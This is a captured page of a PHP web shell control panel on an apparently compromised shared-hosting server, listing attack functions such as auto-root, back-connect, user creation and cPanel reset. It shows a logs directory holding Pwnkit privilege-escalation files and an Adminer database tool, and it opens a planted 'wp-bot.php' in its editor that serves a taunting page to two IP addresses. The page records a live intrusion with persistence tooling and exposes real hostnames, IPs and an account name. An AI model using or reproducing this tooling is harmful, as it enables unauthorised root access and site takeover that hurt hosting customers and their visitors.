Linux host17.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 199.188.200.68 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
8.1.33
shipvipnc2024
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
shipvipnc2024 /
logs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
618
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
shipvip.net-Aug-2025.gz
63.06
MB
-rw-r--r--
shipvip.net-Sep-2025.gz
5.87
MB
-rw-r--r--
shipvip.net-ssl_log-Aug-2025.g...
30.76
MB
-rw-r--r--
shipvip.net-ssl_log-Sep-2025.g...
1.29
MB
-rw-r--r--
wp-bot.php
1.82
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-bot.php
<?php $blocked_ips = ['77.246.104.90', '46.149.74.232']; $ip = $_SERVER['REMOTE_ADDR'] ?? ''; // Если IP в списке — показываем страницу if (in_array($ip, $blocked_ips)) { header('Content-Type: text/html; charset=UTF-8'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Blocked</title> <style> body { font-family: Arial, sans-serif; background-color: #f0f0f0; text-align: center; padding: 50px; margin: 0; } h1 { color: #333; font-size: 2em; } p { color: #555; font-size: 1.2em; } .content { background-color: #ffffff; padding: 20px; border-radius: 10px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); display: inline-block; max-width: 80%; } img { max-width: 150px; margin-top: 20px; } </style> </head> <body> <div class="content"> <h1>Oh, you got scared!</h1> <p>Don't worry, I am your friend. Come sit next to me.</p> <p>We will stare into each other's eyes until someone gets tired.</p> <img src="https://www.holzblaeser.com/wp-content/plugins/wpforms-lite/assets/images/sullie.png" alt="Sullie the Mascot"> </div> </body> </html> <?php exit; } // Если IP не в списке — включаем основной код сайта include('index.php');
Close